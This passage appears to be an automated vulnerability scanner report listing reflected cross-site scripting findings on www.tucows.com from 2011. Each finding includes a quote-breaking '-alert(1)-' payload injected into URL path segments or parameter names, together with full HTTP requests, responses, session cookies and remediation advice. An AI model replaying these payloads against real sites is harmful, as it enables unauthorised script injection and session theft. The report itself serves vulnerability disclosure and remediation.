Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32256
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f648"-alert(1)-"92dc0f19f81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes5f648"-alert(1)-"92dc0f19f81/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31991
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbe1d"-alert(1)-"607a37a5993 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themesfbe1d"-alert(1)-"607a37a5993/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32590
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e65b"-alert(1)-"157ede0dbba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes/03BlueMeany8e65b"-alert(1)-"157ede0dbba/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32182
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b311"-alert(1)-"4061c82776f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes/03BlueMeany/style.css6b311"-alert(1)-"4061c82776f HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32209
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca09d"-alert(1)-"a861b895462 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includesca09d"-alert(1)-"a861b895462/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78125"-alert(1)-"fa4d78589f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes78125"-alert(1)-"fa4d78589f4/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32536
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8817"-alert(1)-"edfcd1015e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes/03BlueMeanya8817"-alert(1)-"edfcd1015e9/styles.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31785
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7526e"-alert(1)-"6df19e35abd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes/03BlueMeany/styles.css7526e"-alert(1)-"6df19e35abd HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31902
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3691"-alert(1)-"68987ea07e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.htmlb3691"-alert(1)-"68987ea07e0 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.375. http://www.tucows.com/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d0f6"-alert(1)-"63213006432 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.html?4d0f6"-alert(1)-"63213006432=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2a0f"-alert(1)-"d3b3f7c7cb3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /previewf2a0f"-alert(1)-"d3b3f7c7cb3/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:31:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=0a1b30a86b03c7fe7a0105c8c64ed6cc; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 0a1b30a86b03c7fe7a0105c8c64ed6cc=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 212c1"-alert(1)-"9b74dc28a7b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preview/194850212c1"-alert(1)-"9b74dc28a7b/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:31:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4a96b6ea2fb1ff12ea5cbccab443adca; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4a96b6ea2fb1ff12ea5cbccab443adca=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
